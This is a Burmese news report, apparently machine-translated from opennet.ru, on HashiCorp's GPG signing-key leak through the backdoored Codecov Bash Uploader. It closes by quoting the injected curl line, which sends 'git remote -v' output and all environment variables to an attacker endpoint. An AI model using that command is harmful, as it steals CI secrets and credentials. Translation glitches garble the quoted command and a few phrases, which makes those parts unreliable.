Vagrant၊ Packer၊ Nomad နှင့် Terraform သည် open source tools များကိုတီထွင်ရန်အတွက်လူသိများသော HashiCorp သည် ထုတ်ဝေမှုများကိုစစ်ဆေးသည့် ဒစ်ဂျစ်တယ်လက်မှတ်များဖန်တီးရန်အသုံးပြုသည့်ပုဂ္ဂလိက GPG သော့ပေါက်ကြားမှုကိုကြေငြာခဲ့သည်။ GPG သော့ကို အသုံးပြုခွင့်ရရှိသော တိုက်ခိုက်သူများသည် HashiCorp ထုတ်ကုန်များကို မှန်ကန်သော ဒစ်ဂျစ်တယ်လက်မှတ်ဖြင့် အတည်ပြုခြင်းဖြင့် လျှို့ဝှက်ပြောင်းလဲမှုများကို ပြုလုပ်နိုင်မည်ဖြစ်သည်။ တစ်ချိန်တည်းမှာပင် ကုမ္ပဏီမှ စာရင်းစစ်အတွင်း ထိုသို့သော ပြုပြင်မွမ်းမံမှုများ ပြုလုပ်ရန် ကြိုးပမ်းမှု သဲလွန်စများ မတွေ့ရှိရကြောင်း ပြောကြားခဲ့ပါသည်။
လက်ရှိတွင်၊ အပေးအယူခံရသော GPG သော့ကို ရုပ်သိမ်းလိုက်ပြီး သော့အသစ်တစ်ခုကို ၎င်း၏နေရာတွင် မိတ်ဆက်ခဲ့သည်။ ပြဿနာသည် SHA256SUM နှင့် SHA256SUM.sig ဖိုင်များကို အသုံးပြု၍ အတည်ပြုခြင်းအပေါ် သက်ရောက်မှုရှိပြီး releases.hashicorp.com မှတဆင့် ပံ့ပိုးပေးသော Linux DEB နှင့် RPM ပက်ကေ့ဂျ်များအတွက် ဒစ်ဂျစ်တယ်လက်မှတ်များ မျိုးဆက်ကို မထိခိုက်စေဘဲ macOS နှင့် Windows (AuthentiCode) အတွက် ထုတ်ပေးသည့် အတည်ပြုခြင်းယန္တရားများ .
စဉ်ဆက်မပြတ်ပေါင်းစည်းမှုစနစ်များမှ လွှမ်းခြုံမှုအစီရင်ခံစာများကို ဒေါင်းလုဒ်လုပ်ရန် ဒီဇိုင်းထုတ်ထားသည့် အခြေခံအဆောက်အအုံရှိ Codecov Bash Uploader (codecov-bash) script ကိုအသုံးပြုခြင်းကြောင့် ပေါက်ကြားမှုဖြစ်ပေါ်ခဲ့ခြင်းဖြစ်သည်။ Codecov ကုမ္ပဏီကို တိုက်ခိုက်စဉ်အတွင်း၊ စကားဝှက်များနှင့် ကုဒ်ဝှက်ခြင်းသော့များကို တိုက်ခိုက်သူများ၏ဆာဗာသို့ ပေးပို့သည့် သတ်မှတ်ထားသည့် script တွင် backdoor တစ်ခုကို ဝှက်ထားသည်။
ဟက်ခ်လုပ်ရန်၊ တိုက်ခိုက်သူများသည် codecov မှဖြန့်ဝေထားသော Bash Uploader script ကို ပြောင်းလဲရန် လိုအပ်သော GCS (Google Cloud Storage) သို့ ဝင်ရောက်ခွင့်ဒေတာကို ထုတ်ယူနိုင်စေသည့် Codecov Docker ပုံကို ဖန်တီးရာတွင် အမှားအယွင်းတစ်ခုမှ အခွင့်ကောင်းယူခဲ့သည်။ io ဝက်ဘ်ဆိုက်။ အပြောင်းအလဲများကို ဇန်နဝါရီ 31 ရက်နေ့တွင် ပြန်လည်ပြုလုပ်ခဲ့ပြီး နှစ်လကြာအောင် မတွေ့ခဲ့ရဘဲ ဖောက်သည် စဉ်ဆက်မပြတ် ပေါင်းစည်းမှုစနစ် ပတ်ဝန်းကျင်တွင် သိမ်းဆည်းထားသော အချက်အလက်များကို တိုက်ခိုက်သူများကို ထုတ်ယူခွင့်ပြုခဲ့သည်။ ထပ်လောင်းအန္တရာယ်ရှိသောကုဒ်ကို အသုံးပြုခြင်းဖြင့် တိုက်ခိုက်သူများသည် စမ်းသပ်ထားသော Git သိုလှောင်မှုနှင့် တိုကင်များ၊ ကုဒ်ဝှက်ခြင်းသော့များနှင့် စကားဝှက်များအပါအဝင် ပတ်ဝန်းကျင်ပြောင်းလဲမှုအားလုံးအကြောင်း အချက်အလက်များကို ရယူနိုင်ပြီး၊ Amazon Web Services နှင့် GitHub ကဲ့သို့သော အက်ပ်ကုဒ်များ၊ သိုလှောင်ခန်းများနှင့် ဝန်ဆောင်မှုများဖြစ်သည့် Amazon Web Services နှင့် GitHub ကဲ့သို့သော ဝန်ဆောင်မှုများကို စဉ်ဆက်မပြတ်ပေါင်းစည်းမှုစနစ်များသို့ ပို့လွှတ်နိုင်သည် .
တိုက်ရိုက်ခေါ်ဆိုမှုအပြင်၊ Codecov Bash Uploader script ကို Codecov-action (Github)၊ Codecov-circleci-orb နှင့် Codecov-bitrise-step ကဲ့သို့သော အခြားသော အပ်လုဒ်တင်သူများ၏ တစ်စိတ်တစ်ပိုင်းအဖြစ် အသုံးပြုထားသည်။ codecov-bash နှင့် ဆက်စပ်ထုတ်ကုန်များ၏ အသုံးပြုသူအားလုံးကို ၎င်းတို့၏ အခြေခံအဆောက်အဦများကို စစ်ဆေးရန်၊ စကားဝှက်များနှင့် ကုဒ်ဝှက်ခြင်းသော့များကို ပြောင်းလဲရန် အကြံပြုထားသည်။ စာကြောင်းတစ်ကြောင်း curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || မှန်ပါတယ်။
source: opennet.ru